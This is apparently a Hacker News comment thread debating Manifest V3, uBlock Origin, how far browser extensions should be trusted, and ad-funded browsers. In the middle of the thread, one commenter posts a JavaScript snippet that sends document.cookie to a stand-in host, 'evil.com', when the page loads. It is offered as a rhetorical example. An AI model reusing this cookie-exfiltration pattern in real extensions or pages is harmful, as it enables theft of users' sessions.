                It's illegal to distribute. Unambiguously. That's how DMCA works. If Mozilla were to add it back to the store, they would be acting illegally.

avaer

What's funny is that extensions were supposed to be a way to let you do the things the browser didn't want you to do. Guess that was a bit too much freedom for Google to accept, so they had to make a store with a gate, and destroy the APIs so that they're useless. Then they had to make up some reasons to justify that and ram it through the pipeline despite everyone's objections, and the frog got boiled.

Now we're back to needing an actual extension system that does what extensions were supposed to do in the first place.

  • matheusmoreira

    > Then they had to make up some reasons to justify that

    Hate to be the one to defend Google here, but the reasons weren't that unreasonable. I want my browser to prevent random extensions from directly reading web page data. The declarative API idea is pretty good.

    It's just that uBlock Origin is so insanely useful, important and trusted, it should get full access to the entire browser regardless. Honestly, it should be literally built into the browser instead of being a mere extension. Only the conflicts of interest inherent in an ad company maintaining an ad blocker prevent that.

    • michaelt

      > I want my browser to prevent random extensions from directly reading web page data.

      To be honest, to me it sounds like you don't want browser extensions then.

      To me, directly messing with web page data and browser behaviour is the whole point of a browser extension - what else is a browser extension for?

      • lxgr

        Why should there not be a middle ground between “can do absolutely everything with all my data” and “is basically a glorified bookmark button” based on the level of trust I have for an extension?

        • mzajc

          Because security is the pretext, not the goal here. I'm sure browsers could have better security controls for extensions, but giving users extra control over software doesn't seem to be very popular among corpos nowadays.

        • account42

          Because the middle ground would require the browser defining what an extension can and cannot do which defeats the entire point of extensions.

        • inigyou

          Because the browser already has bookmark buttons

      • matheusmoreira

        The purpose of browser extensions is to build up an install base then sell out to some corporation that then promptly leverages that user base to exfiltrate data and monetize it.

        No thanks. They should have to declare to the browser what it is they want done instead.

        • tmgldn

          This point would be far more credible if browsers weren't in business to do what you claimed extensions are there to do.

          I'd also argue that creating a full browser without a profit motive is more unrealistic than creating an extension and uploading it - for free - to a web store.

          • glenstein

            Right, basically no web browser has a profitable business model except through licensing or being subsidized through some other branch of the business.

            The best pure browser company in history was Opera, and they didn't fail because they weren't innovating. It is simply not a survivable model. People don't remember anything, but during Google's recent anti trust case, one floated "solution" was to spin Chrome off as a separate company, but that was regarded as unrealistic partly because such a company would not have a credible path to profitability separate from Google.

            I happen to disagree, they could have collected a search licensing fee just like Firefox but that model is already being regarded as monopoly adjacent.

            • fzeroracer

              FYI, Opera didn't fail as much as they sold out. It was still sustainable, but the former founder/CEO left over this spat and formed Vivaldi over it.

              • glenstein

                Thanks, that's good info. I found this thread from an ex Opera employee and to your point, they could have kept on with Presto, but didn't [1]. What remains true is that bad management chased profits and found a better path to more revenue by caving to webkit and Chromium. So it wasn't strictly unsustainable so much as outcompeted by better economics that came from abandoning Presto. I consider the soul of Opera to be gone at this point and the amount of personal integrity and vision it takes to swim against the current of short term revenue is another manifestation of unfavourable browser economics for sustaining an independent engine.

                1. https://old.reddit.com/r/operabrowser/comments/3jxud3/exoper...

        • static_motion

          And extensions do exactly that in Firefox. When installing (or updating) extensions you're notified of any and all permissions the extension is requesting from the browser and you're given the choice to proceed with the installation or not. Google goes a step further and just straight up denies user choice entirely.

        • a2ff6eeb0

          I think you're confusing the extension and the browser. The browsers are generally in the business of supporting an advertising company.

        • jamesnorden

          It still sounds like you don't want browser extensions then.

        • inigyou

          ... But they do that. The declaration is written in a language called JavaScript.

          • matheusmoreira

            Javascript is not a declarative language.

            • xdavidliu

              There are at least two uses of "declare": one the colloquial english usage that has been around for at least hundreds of years, which roughly means "announce" or "state". The other use of declare is the much more specific programming language version which you're referring to.

              Here's what the comment you're responding to said:

              > They should have to declare to the browser what it is they want done instead.

              Arguably it's pretty clear they meant declare in the first sense.

              • matheusmoreira

                I'm the one who wrote the sentence you are quoting, and I most definitely meant it in the sense of "declarative language, where you say what you want and the runtime figures out how to do it internally".

            • inigyou

              Sure it is.

              Here's how you can write a declaration that you want to exfiltrate cookies:

                  document.addEventListener("load", function(){
                      fetch("http://evil.com/"+document.cookie);
                  });
        • functionmouse

          absolutely insane take

        • 7bit

          Bro, they have to declare there Firefox's policy. What the heck are you doing? Hallucinating claim after claim to support your weak defense. Just stop

          • matheusmoreira

            "Declare" means the extension tells the browser what they want to filter and then the browser does it internally without ever allowing the extension to read and write private information.

            The argument has nothing at all to do with declaring permissions in a manifest.

    • codedokode

      Yes, but if you write your own extension maybe you want to read and modify the data. For example, patch fingerprinting script so that it gets the wrong result.

      Furthermore, malicious extension can read the data from the DOM, from forms (for example, password or credit card fields), and in some cases, from JS variables. They can insert fake information into the page. So preventing extensions from reading network data still leaves a lot of options for a malicious extension.

      • jimmydorry

        So you're saying that because Google didn't completely up-end the security model and break almost every extension in the one-go, we should have no-progress towards a more secure extension model?

        uBlock Origin via declarative blocks is almost as powerful as the original. While I would trust gorhill with almost unfettered control over my browser, I don't trust EVERY extension owner (no do I trust uBlock Origin in perpetuity).

        • glenstein

          >So you're saying that because Google didn't completely up-end the security model and break almost every extension in the one-go, we should have no-progress towards a more secure extension model?

          A funny argument to make because the thing that would make such a measure ridiculous as you rightly point out, is exactly what already makes the Manifest changes ridiculous in the first instance. They were making a rhetorical point and you elaborated on their point for them as if doing so expressed a disagreement.

          • jimmydorry

            I think a big step forward, towards a better security model, was overall a good thing, even if it meant that a good extension no longer had unfettered access to everything your browser saw. I don't think this change is ridiculous at all. And I don't want them to stop here either! v4 should close more of the avenues that malicious extensions are abusing! Extensions should declare everything up-front, so it's easy see if abuse is occuring.

            • simonra

              How do you secure against the system vendor (in this case the browser) limiting what the consumer/user can or can't do (alone or with the help of third parties) with the product after acquiring it though? After all security for individuals against commercial and otherwise organized interests is one of the, if not the most important security after life and health. Even if one values the market overall for financial reasons, there is a solid argument that preventing modifications (and thus also repairs) is anti-competitive. It would be damaging to society if manifestV4 is realized restricting what can run further, much like printers and operating systems where the users ability to run software they bring themselves is limited has been. Just as no one should have to go to a mechanic with a special deal with the manufacturer to get their car or tractor to work as desired, neither should users of software.

              • jimmydorry

                >How do you secure against the system vendor (in this case the browser) limiting what the consumer/user can or can't do (alone or with the help of third parties) with the product after acquiring it though?

                If you don't like what a browser is doing, then move to another one? You're acting like you have spent a tonne of money on buying Chrome. Even if that was the case, it's not a clear case of an anti-user behaviour. There is a good reason to deprecate the webRequest API, and we'll see more browsers move towards that in the future (Safari has had declarative blocking for many years now, I believe).

                >preventing modifications (and thus also repairs) is anti-competitive

                There is nothing stopping someone from forking a manifest v2 version and maintaining it. I'd argue this can't be compared to any company actually doing anti-competitive things (e.g. tractor company, printers, ice cream machine companies, etc.)

              • maccard

                You use a different browser, like Firefox.

                • Forgeties79

                  A browser that is routinely dumped on by HN for not being perfectly managed lol

                  • xboxnolifes

                    HN routinely dumps on chrome too. There is no browser HN likes.

                    • Forgeties79

                      Well chrome is obvious. Firefox always triggers the same complaints about Mozilla foundation. They’re valid, but the dog pile is always very striking. At the end of the day Firefox is a great browser and has enabled a bunch of great forks all outside of the chromium ecosystem. We can be critical and should be, but again, it’s very intense sometimes. Google is clearly worse.

                  • account42

                    "How dare you complain that I pissed on your carpet when the other guy took a dump on it."

        • inigyou

          We should have the option to limit an extension to certain tabs or websites or at least windows, and extension authors should also have the option to specify that.

          An adblocker, by its nature, needs to access *. But Return YouTube Dislike could statically specify that it will only run on youtube.com, and that's fine.

          But the option to enable access to * is essential.

          • jimmydorry

            >An adblocker, by its nature, needs to access *

            Well that's what is in contention. Does everything claiming to be an adblocker really need access to *? Is Adblocker5++ (totally not malware) entitled to as much access as uBlock Origin? You can declare upfront all the URLs you don't want accessed (which on top of security gives a substantial performance boost), and who's to say someone won't figure out a better way of working within these constraints?

        • franga2000

          Removing capabilities is not progress towards better security. Putting them behind opt-in permissions, making permissions more granular, more robust... those are security upgrades. Removing capabilities is a feature downgrade.

          • jimmydorry

            Security upgrades are never opt-in, and for good reason. The status quo would remain in-secure. Every encryption suite upgrade, SSL software version, DNS versions, etc. maintained backwards compatibility for a window then closed it... just like we have seen here with manifest v2 -> v3.

            "Please stop looking at all network requests, especially when you don't need to."

            doesn't result in action... while:

            "You can no longer look at all network requests" requires extension makers to update to the new paradigm.

            • franga2000

              New versions of encryption suites don't remove core functionality. This is like TLS removing SNI because it leaks information. It does, but the solution is ESNI, not removing SNI all together.

              It's not "please stop looking at network requests", it's "ask the user for informed consent to look at network requests". Make it a big scary red warning if you want to. Definitely don't auto-grant it to existing extensions.

              There are many options that don't involve removing functionality. It's like when Google removed SMS and clipboard permissions because they used to be too broad. People were pissed, a bunch of apps were killed, Google's walled garden got reinforced...

    • drtgh

      >Hate to be the one to defend Google here, but the reasons weren't that unreasonable.

      Sounds like some kind of Stockholm syndrome. Years ago, it was standard practice for software to be designed so that users could grant permissions to access invasive methods or functions.

      Google relies on users' personal data (ads), which is why they introduced a unique ID to their Chrome browser (to track).

      • edoceo

        When was that standard practice? Cause years ago (like 2000) I remember even trivial and simple software (WeatherBug) being able to read/write all over the computer (Windows). And some crap I just installed on Win11 can see all over the box, just slightly less.

    • tremon

      I want my browser to prevent random extensions from directly reading web page data

      I also want my browser to prevent random third-party javascript from doing the same. And I care more about that one, because as a user I don't have control over said third-party javascript while I do have control over the extensions I'm using. The browser is supposed to be a user agent, not act as an extension of the website owner.

    • xtracto

      > I want my browser to prevent random extensions from directly reading web page data

      This is so funny to me. Coming from a Netscape Navigator world, when extensions first came out, they were supposed to allow the user to add functionality to websites.

      Why would someone install "random extensions" that they dont trust. And also, what would extensions do if not read and write data to websites? .

      Sign of the times I guess.

      • duskdozer

        Extensions are set to auto update by default, and it's not obvious at first how to disable that. It's also disallowed to install an extension you've built from source on most release builds, without messing with a hex editor. So essentially, any extension you install is liable to be come a "random" extension, if for example, the author sells out, or something like the attacks on NPM were to happen.

      • latexr

        > Why would someone install "random extensions" that they dont trust.

        An extension that you trust today can be sold to an unscrupulous third-party tomorrow. That has happened many many times and will continue to.

        • shaky-carrousel

          And sometimes the unscrupulous third party decides to build a browser and take over the market via forcing hardware vendors to bundle it with their OS. Like Google.

        • feelamee

          so, it should not be updated automatically. so, you should not trust something that install updates (literally - install another software) without your agreement

          • xtracto

            Back in the mid 90s when the web started to be all the rage, I remember reading a comment I thought hilarious and kind of right. Paraphrasing a lot it went like this:

            "Somehow, when people get into the internet, their IQ decreases like 50 points. Like, if a guy knocked on your house door and offered you to give you a million dollars if you just gave him a thousand now, you would tell him to F. off. But somehow on the internet people thing it's right"

            Same with these apps, someone comes and tells you to let him install this great water appliance for your backyard. You let him come in. But somehow in the internet, you also give him the key so that he can come in again anytime he wants... he may sell the key, lose the key, do something malicious later,etc. But due to ignorance, people dont grasp what they are doing in the digital world. People lack the necessary mental models.

      • matheusmoreira

        > Why would someone install "random extensions" that they dont trust.

        Same reason why people download random stuff and run it with administrator permissions on Windows.

    • AnonymousPlanet

      If you look at all the threat vectors of a browser from a user perspective, a rogue extension is well at the lower end.

      If you look at the threat vectors for the revenue of a company like Google, extensions that aren't limited by the browser are pretty much number one.

      This should tell you everything you need about the matter.

      • jimmydorry

        If you've run a site with CORS reporting enabled, you'd see that a significant fraction of your userbase have malware extensions running (prior to manifest v3). I was absolutely shocked when I looked at the logs a decade ago, and I bet the problem is far worse these days with the proliferation of malware buyouts of legit extensions.

        Google has no shortage of options for serving up ads that can't be blocked by normal ad blockers across all their properties (youtube, search, etc.). They in-line the ads these days! And if they really cared about the fraction of a fraction of a percent of people that even install any kind of adblocker, they could make the served ad content un-blockable by serving it the exact same as the content.

    • aucisson_masque

      > Hate to be the one to defend Google here, but the reasons weren't that unreasonable. I want my browser to prevent random extensions from directly reading web page data. The declarative API idea is pretty good.

      Don't kid yourself, even with mv3 if you install a rogue extension it's going to have access to a lot more data than you would be comfortable sharing to.

      • matheusmoreira

        Yes, which is why it is important to lock such things down.

        • aucisson_masque

          You can't trust a code that you didn't audit before. End of story.

          What you are asking for is simply impossible, even without any permissions rogue extensions can still do a lot. It's what some developers spend their entire time working on.

          If Google couldn't fix it with Android, which has granular permission per applications, why do you think it's going to be even remotely effective on the web browser ?

        • inigyou

          How would you do that?

    • flomo

      > I want my browser to prevent random extensions from directly reading web page data. The declarative API idea is pretty good.

      Agreed. And you would think most paranoid HN types would too.

      > It's just that uBlock Origin is so insanely useful, important and trusted

      Maybe I'm foggy on the history. But isn't this like Fork #4 or #5 of some previous AdBlock extension?

      Seems like the only business model for this type of extension is "selling out" for certain ads. And then the cycle repeats and forum posters tell you to install qBlock Omega or whatever. Maybe Mozilla doesn't want to get in the middle of this?

      • notpushkin

        > Maybe I'm foggy on the history. But isn't this like Fork #4 or #5 of some previous AdBlock extension?

        IIRC it was written from scratch. It was called uBlock before, then a co-maintainer tried to pull some shit, and the original author had to fork it with a new name (I don’t remember the details, it’s been ages since then).

        No selling out yet. The author also explicitly says they don’t accept donations. I don’t think he’s looking for a business model. But if that changes – yeah, the fork button is right there, so I don’t see a big problem here.

    • bo1024

      Of course it's tempting to reply "don't install random extensions". But a bigger point here is that browsers have grown so massively complex that it's almost impossible to build one, so we don't have an ecosystem where you can choose your browser for safety and I can choose mine for freedom. Of course, Google has had a big incentive and hand in making it this way.

    • radley

      > I want my browser to prevent random extensions...

      Why are you installing random extensions?

      • lxgr

        Not GP, but sometimes I want my browser to do pretty random/niche things without that compromising all of my browsing data.

        • inigyou

          How can the browser tell the difference between a random thing you want and a random thing you don't want?

          • dotancohen

            The permissions mechanism.

            • feelamee

              this is not a solution. Running an untrusted software will always be a security drawback. Permissions/sandbox/etc can decrease risk, but not eliminate it

              • lxgr

                Significantly reducing the risk is enough for me in many cases. Chasing “zero risk” is often a fallacy.

              • dotancohen

                Expressing intent is good enough for me for this purpose. I understand that there are additional implementation specific risks.

            • inigyou

              How can the permissions mechanism be fine grained enough to prevent bad random things, and coarse grained enough that you can understand it?

              • lxgr

                Requesting site access by click or by URL really isn't rocket science.

                Not nearly every user will get it right, so extensions will probably still have to be monitored for malware for the foreseeable future, but it gives many users at least a chance at privilege minimization.

              • dotancohen

                Have you seen AWS IAM?

                Power users who care about this don't need a GUI - a text file config in any format will do. Especially in this era of LLM assistance.

        • SoftTalker

          Create a new profile, do the niche thing there, separately from the rest of your browsing.

      • matheusmoreira

        I'm not. The only extension I trust enough to install is uBlock Origin.

        • FeepingCreature

          Well great! You are already protected from random extensions then.

          • matheusmoreira

            Yeah, by opting out of them altogether. I'd very much enjoy having useful extensions that are not dangerous instead.

            • aucisson_masque

              You can't trust a code that you didn't audit before. End of story.

              What you are asking for is simply impossible, even without any permissions rogue extensions can still do a lot. It's what some developers spend their entire time working on.

              If Google couldn't fix it with Android, which has granular permission per applications, why do you think it's going to be even remotely effective on the web browser ?

              • Ballas

                Do you audit all the code running on your PC? I certainly did not audit Chrome (and I also don't really trust it).

    • bambax

      > I want my browser to prevent random extensions from directly reading web page data.

      I don't want that! I want to be able to install any extension whatsoever (as we still can, more or less, install programs). And if I'm clueless enough to install "random" extensions that'll harm me, then shame on me! How often has it happened for the whole existence of Manifest V2 anyway?

      Maybe we could have tolerated a well-hidden, well-protected "advanced" flag to open that possibility. But removing Manifest V2 altogether is unforgivable.

      Also, security is a very very very weak argument, as many ads are much more dangerous and toxic than any popular extension will ever be.

    • tpm

      Then don't install them. I want my extensions in my browser on my computer to do whatever I allow them to do and not what's allowed by Google.

    • FeepingCreature

      "Random" is a funny thing to call an extension that you have deliberately installed.

      I also don't want "random" programs accessing my home folder. That would be terrible! Who knows what programs that could be! I do however want the very specific programs that I have intentionally installed to be able to access my home folder easily. Same for extensions.

      The goal here isn't really to protect me from extensions. Extensions don't do anything on their own, they just sit there and wait for me to install them. So the goal is apparently to protect me from me (installing an extension), which really is to say protect their business (ads) from me (blocking them).

      • matheusmoreira

        "Random" is what I call pretty much every extension that is not uBlock Origin. I absolutely want them limited to the fullest extent. Maybe if they were, I would actually install some of them.

        > I do however want the very specific programs that I have intentionally installed to be able to access my home folder easily.

        I don't. My standard operating practice is to virtualize them.

        My security posture is considerably more lax towards free and open source software, for obvious reasons, and even then this trust only extends to the software in my Linux distribution's repositories. Stuff coming from PyPI, npm, cargo, ruby gems, and other such "developer centric" repositories get the full virtualization treatment. If it's easy for randoms to publish packages, then it's equally easy for malware to make it in.

        • inigyou

          You should make a browser for you, like a QubesOS browser. Do you use QubesOS? If not, you should.

          But you can't lock down everyone else's general-purpose computers just because you are more careful than the average. You're supporting the big corporations in the war against general-purpose computing here.

        • sersi

          What do you use for virtualization for tools from developer repositories? Run them in a VM or sandboxing like bubblewrap?

          • matheusmoreira

            QEMU virtual machines. Sandboxes like firejail and bubblewrap share a kernel: attacker is one exploit away from root. Hypervisors present an infinitely smaller attack surface, and if they're ever defeated the entire industry is done, not just me.

            I have a base system image that gets forked off into delta qcow2 images for every project I'm working on or whatever ephemeral execution context I need.

            I started a side project to build software just to manage those VMs. I'm daily driving this thing even though it's my first "vibecoded" project, it's just way too useful and has saved me quite a few times from accidents.

            https://github.com/matheusmoreira/virtdev

            The firewall works but it's pretty clunky. I'm working on a custom Rust network stack to replace it.

            You'd probably prefer something that isn't literally made by one guy and his AIs though. Docker sandboxes seem to be a good solution that also employs virtualization.

            https://news.ycombinator.com/item?id=49239751

            Before I made all this, I used to use firejail.

    • yjftsjthsd-h

      > I want my browser to prevent random extensions from directly reading web page data. The declarative API idea is pretty good.

      I was under the impression that manifest v3 still allowed extensions to read anything, just not modify. Is that not the case? (Random link because this is hard to search for: https://news.ycombinator.com/item?id=38303446 )

      • matheusmoreira

        Yeah, if that's true then there's little point to Manifest V3... That completely invalidates the argument that it increases security by denying private page access. Maybe I misunderstood Manifest V3.

        • inigyou

          All roads lead to Occam's Razor and POSIWID: the point of Manifest V3 is to block adblockers.

    • willis936

      >it should be literally built into the browser

      Orion does this. It's still a little too rough around the edges to recommend as a daily driver though.

    • cma

      The Google Toolbar for Internet Explorer let users search Google directly from any webpage, block pop-up ads, autofill web forms, and highlight search terms. It also displayed PageRank metrics, translated foreign languages, checked spelling, and managed web bookmarks.

    • colordrops

      Don't defend them then. Do you believe the same should be true of your operating system? If not, then it shouldn't be true of the browser either.

      • matheusmoreira

        > Do you believe the same should be true of your operating system?

        Yes, and I have actually started virtualizing everything inside my computer because of that belief. I don't want random software touching my trusted host.

        "Random software" is currently defined as anything outside the official repositories of my Linux distribution of choice. I don't want to share a home directory with such things. I don't want to share a user and its permissions, I don't even want to share a kernel with them.

        • FeepingCreature

          There's a difference between you virtualizing programs and your OS vendor virtualizing programs for you without giving you an opt-out. Cough snaps cough.

          • matheusmoreira

            Agreed, and I do think it's unfortunate that our browsers are funded by ad tech. I want that to change.

    • safety1st

      This sounds like another one in those class of arguments that are essentially "We can't let users accidentally harm themselves on the devices they own." While I appreciate ergonomics and sensible defaults, ultimately I don't need you, Google or anyone else telling me I can't do something with my device because it's too dangerous to me. I mean I have a huge F U for anyone who tells me that quite frankly, just as I would if they said it about my car or my kitchen knife. I cleared the age of consent decades ago, I will use what I bought and I will accept responsibility for all of the outcomes. These little poindexter dictator nerds of IT who think they get to control everything about what I own can F right off. I applaud and will participate in any class action lawsuit against them and hope for the maximum penalties to be inflicted upon them.

    • ezoe

      Mozilla relies 85% of income from Google for making default search engine Google.

      They probably have strong implicit pressure not to.

    • behringer

      Of course the reasons weren't unreasonable, that's what made them great excuses for specifically blocking ublock origin.

      • matheusmoreira

        They don't specifically block uBlock Origin though. I have no doubt they intended it to, and that's literally my only objection to Manifest V3: it's good but it hurts uBlock Origin therefore I don't accept it.

        The right thing is to simply bypass all of that. The fact is uBlock Origin should be literallly built into the browser like the good old popup blockers once were.

        If only we had a browser that was independent of ad money.

        • inigyou

          Of course the reasons weren't specific to ublock origin, that's what made them great excuses for specifically blocking ublock origin.

    • delusional

      > I want my browser to prevent random extensions from directly reading web page data.

      Fine, then don't install them?

      It's like saying you want your TV to stop random people from watching it, but the obvious solution to that problem is to not invite random people into your living room.

    • doctorpangloss

      Nothing stops people from using a fork with manifest v2 support restored. In fact "VibeChrome" would probably be a successful product.

      • inigyou

        First you'd get sued because chrome is a Google trademark

      • theragra

        It was by many, and it was decided to be too hard. Nobody is ready to do that.

    • ajb

      ... the greatest danger to us is masterless men; lacking a coercive power to tie their hands, they would destroy society. How else but by binding to lord and master can they be held to the laws? So thought men during feudal times.

      In fact, it is possible for people to be held to good conduct without being bound into a single hierarchy, and it should be possible for software to be held to good conduct without giving such power to single monopolists. But it's not in Google's interests to build such mechanisms, any more than it was in the interests of the feudal overlords to look for alternatives to their rule.

      • matheusmoreira

        I'm supposed to be the master, actually. It's my computer, any foreign code is essentially a subject in my digital domain. It should be literally impossible for them to do something I don't want them to do. As the god of my little digital realm, I should have maximum power and freedom, while foreign developers get the absolute minimum amount of power that works, and in the ideal case this minimum is zero.

        The fact someone gave developers a turing complete language inside the browser where random code is automatically downloaded and executed is a major reason why we even have uBlock Origin in the first place. The vast majority of developers heavily abuse this privilege and cannot be trusted, and that is why we block them with extreme prejudice.

        • ajb

          I agree that we should able to be fully in control of what we run on our machines, but that should also include being able to decide who we trust to mark , or gatekeep, code as trustworthy. Both having to run code from any random website, and having to trust exactly one mega company, means you are not the master.

        • ryandrake

          This is the way. The owner of the computer should be the ultimate authority over what gets run and not run on that computer. Not Microsoft. Not Apple. Not Google. Not Mozilla. Not some web site developer.

        • inigyou

          I think nobody is against the availability of sandboxing tools for browser extensions - they just want them to be options and not requirements or defaults.

        • duskdozer

          We seem to have a similar philosophy. Have you found a good way to deal with modifying or selectively disabling things like webpacked js or react?

          • matheusmoreira

            I've tried everything from relying on uBlock Origin's anti-sabotage injections to literally reverse engineering websites and directly using all the internal APIs their own javascripts consume.

            My dream was to have a "custom HTTP client" for every website. Instead of one browser for all sites, I write "adapters" for them that scrape the data into my own schemas. Maintaining this was far too much work back then, but now that I've got AI... I think I might try it.

            • duskdozer

              >uBlock Origin's anti-sabotage injections

              Do you mean the rules like

                  *##+js(acis, document.oncontextmenu)
              
              (an example I just added (copied) today)? I've had a lot of trouble figuring out how to make these properly.

              >reverse engineering websites and directly using all the internal APIs their own javascripts consume.

              Interesting. By userscript or some other way? I've run into a number of situations where I either can't find a pointer to the internal js, or if I do find one, the browser or something ends up preventing me from accessing or modifying internal state with some sort of permission error. The latter might just be React though.

              I'd be very interested in looking, if you have open sourced any of this.

    • franga2000

      Your browser does prevent random extensions from reading web page data - it prevents all of the ones you don't install!

      More seriously: if you don't want X to do Y, the solution is to not give X the permission Y. The platform overlord removing the premission Y completely is a terrible solution.

    • 7bit

      No worries. Reading the rest of your comments shows, that your defense is paper thin .

    • dismalaf

      > Honestly, it should be literally built into the browser instead of being a mere extension

      Aaaand that's why I'm using Vivaldi over here (which has a built-in adblocker).

    • latexr

      The amount of replies this has gotten regarding the use of “random” is a fine example of the state of discussion on the internet and in general, and how HN is in no way immune.

      Clearly “random” was used as a means of saying “any”, to describe extensions the author hasn’t thought of. That will be obvious to anyone arguing in good faith and steel manning the argument.

  • socalgal2

    > Google ... had to ... destroy the APIs so that they're useless.

    I see this repeated over and over and yet uBlock Origin Lite still seems to block almost all ads. I'm not saying I wouldn't prefer the non-lite version. But, given I basically still don't see ads it's kind of hard to argue Google destroyed the APIs so that they're useless

    • aucisson_masque

      The crux of the difference is the webRequest API which is only available in Manifest v2. This allows uBlock to strip all tracking data from the requests themselves. So while Chrome w uBlock Lite is hiding almost all the same ads from you, it's not protecting you from tracking

      The Lite version also relies solely on filter lists that require you to update the extension itself while the MV2 version can do so dynamically. Additionally, it lacks CNAME Uncloaking which I imagine will become much more commonplace soon enough which will make it impossible to block those ads.

    • fsflover

      > uBlock Origin Lite still seems to block almost all ads

      https://news.ycombinator.com/item?id=49305464

    • what

      There’s also ad blockers for iOS safari, which I’m pretty sure doesn’t support ublock. There’s nothing in manifest v2 that’s required for ad blocking.

      • armadyl

        uBlock Origin Lite is available on iOS/iPadOS for Safari however last time I checked it’s inferior to AdGuard/Wipr due to the API it uses (it only works in Safari but doesn’t provide ad blocking in the web views like the other two do). Otherwise it’s equivalent with the desktop version.

        • what

          Okay. So there’s still nothing in manifest v2 that’s required for ad blocking?

          • armadyl

            Realistically with the new uBOL you’re just limited to the amount of rules you can use (I think it’s like 300k), no cosmetic filtering in default mode, no script injection in default mode, “limited dynamic filtering capabilities,” and needing more permissions up front.

            In practice to me these are non-issues. With MV2 uBO you basically already grant it maximum permissions since it’s all or nothing with MV2. So giving full permissions with MV3 uBOL is no different. Which eliminates the cosmetic filtering and script injection limitations.

            The rule limit can maybe be an issue, but I’ve never run into it unless I literally go hog wild and overboard on filter lists.

            “Limited dynamic filtering capabilities” is more abstract to me at least and I can’t say what’s missing here.

            In practice though ultimately I notice no difference between Lite and the original.

  • Gigachad

    Browser extensions were also one of the biggest ways to distribute malware. The situation was genuinely horrific. Malware distributors would offer popular extension devs millions of dollars to buy the extension, then silently insert malware which gets auto deployed to millions of people.

    • OroPla

      But why blame the extensions instead of the auto-update feature? Wouldn't it be more effective to build external code review practices around the extension eco-system? For example, if you want to publish or update an extension, you first have to review someone's elses or something along those lines.

    • underlipton

      That sounds more like an issue with the update policies.

    • uncletammy

      Lungs are one of the most effective ways of distributing disease. You'd be shocked at how many people get sick and die because LUNGS! We should immediately do away with lungs!

    • inigyou

      Why haven't they been prosecuted? And why hasn't this "cindyllm" bot account been deleted yet? Clearly a shadowban didn't send the message.

  • inigyou

    Firefox extensions are already so incredibly locked down. It used to be they could edit any part of the UI anywhere. Now they each get a button at the end of the URL bar if they're lucky, otherwise it's some obscure hamburger menu item.

    • tredre3

      You have full control of whether or not their button is in your toolbar.

      If they are hidden for you, it's because you, the user, hid them or enabled the overflow extension menu.

      • inigyou

        I, the user, don't understand how this works and just see my browser thinking it's better than me and should be my master.

  • tomjen3

    There are good solid reasons why Manifest v3 is preferable for most extensions.

    The issue is that adblocking doesn't work with it, so an addition, or workaround should be made, but when Google has the amount of influence they have, that didn't happen.

    The upshut is that people hate ads and like free stuff, so there is now a good selling point for Firefox. Hell some of us switched to Firefox because it blocked popup ads and had tabs, back in the day.

    • armadyl

      > The issue is that adblocking doesn't work with it

      Except this is objectively not true…

      uBlock Origin Lite is nearly as good as uBO and blocks nearly everything except for mostly Twitch ads.

      Manifest v3 is a big security upgrade and effectively closes off the permanent RCE pathway that v2 allowed.

      • inigyou

        So we already see one major ad category it's unable to block. When will advertisers catch on to put more of their ads in that category?

        • dopa42365

          Twitch ads haven't reliably been blocked by ublock origin (in any browser) for years. The "best" solution people came up with is replacing the stream with an ad-free low res version for the duration of the ads, which doesn't make for a very enjoyable viewing experience. There were/are some more experimental options like m3u proxies to jurisdictions where Twitch isn't serving any ads for one reason or another, but those aren't reliably working all the time either. In any case, somewhat outside the scope of ad blockers and closer to paywall circumvention-ish.

        • armadyl

          Except normal uBO also failed to block Twitch ads so there’s no difference here.

  • croes

    > extensions were supposed to be a way to let you do the things the browser didn't want you to do.

    If that would have been the case, extensions wouldn’t exist.

    Extension are a way to make the browser do what the browser manufacturer didn’t think or care about.

windowliker

I often forget how browsing the web looks for most people. Can't understand why they put up with it, or do they just think that it's part and parcel of the internet to have every page look like a slot machine from hell?

  • scared_together

    I currently don’t use ad blockers. The only time I used ad blockers was when a previous employer specifically asked me to, when using a company machine.

    > Can't understand why they put up with it

    To see which (rare) sites don’t put up a million ads and actually care about the reading experience.

    A lot of the top-listed sites on HN are small blogs without ads (or in the case of danluu.com or lwn.net - without almost any formatting).

    daringfireball.net is notable for actually having small, non-intrusive ads that I wouldn’t ever feel the need to block (unless you consider the entire site an ad for Apple but that’s a seperate concern).

    > do they just think that it's part and parcel of the internet to have every page look like a slot machine from hell?

    It is integral to the business models of the sites putting up those ads. And if those sites don’t make money then they’ll also be unable to pay writers. Much like herd immunity or financial speculation there will always be “somebody else” to watch the ads and essentially subsidize the ad-blocking audience, but I’d rather not be one of those people, I want my usage to be worth the while for the writers.

    I am sometimes (rarely) willing to pay for an ad-free experience if I’m a repeat visitor. But more often I’d rather not visit at all if a site is too annoying. Another unfortunate situation is that even if you pay for a subscription, some sites have no ad-free option, such as the New York Times.

    The big exception is YouTube, where I visit often, am bombarded with ads but also don’t want to pay Google.

    • GeneralMaximus

      In an ideal world, I would do exactly what you do. I don't WANT to block ads everywhere. I would love to support my favorite websites, and if watching a couple of ads is what it takes for them to stay online, then I don't really mind.

      Problem is, the ads I see when I disable my ad-blocker are uniformly terrible. Maybe this is because I'm in India, but I've never once seen an ad that wasn't outright disgusting, let alone useful.

      I regularly see ads for: escort services, shady hair loss prevention pills, shady weight loss pills, astrology, TV shows and movies in languages I don't understand, gacha games, gambling apps, educational programs I can't sign up for, apps that are clearly malware. Once Instagram inexplicably showed me ads for expensive lab equipment only available in Germany for a whole week.

      I would like to see ads for: local businesses around me, concerts and gigs in my city, new restaurants around me, indie fashion brands, TV shows and movies in languages I can understand. Basically, ads based on my interests and recent search terms.

      The ad networks insist on delivering the worst kinds of ads to me, sometimes accompanied by imagery I would prefer not to see (e.g hair loss and dermatology ads). The websites I frequent and want to support don't get to choose what ads I'll see. All they can do is insert the ad-network's JavaScript into their pages and hope for the best.

      Unless the networks can guarantee that I won't see something illegal, harmful, or plain disgusting when I enable their ads, I'll keep my ad-blocker on. I'm not going hurt myself for somebody else's business model.

      • squigz

        While I think I agree with you in principle, it's worth pointing out that at least some of these targeted/relevant ads you want come with privacy concerns which, at least in my opinion, are just as important if not more so than the content/experience of the ads themselves.

        Either way though, GP putting the responsibility on the viewer, at this point - given what we know about how the ad companies operate and use our data - is just absurd. We're not the ones who burned up any good will in this particular social contract.

      • dabinat

        In theory site owners could be more selective about the ad networks they partner with. They bear a responsibility for a poor user experience, but many don’t care.

        I remember hearing about a lawsuit several years ago from several news organizations against an ad blocking company in which they described themselves as “ad companies that serve content” as opposed to “content companies that serve ads”.

        • achenet

          To be fair to the news organizations, ads are very probably their primary source of revenue.

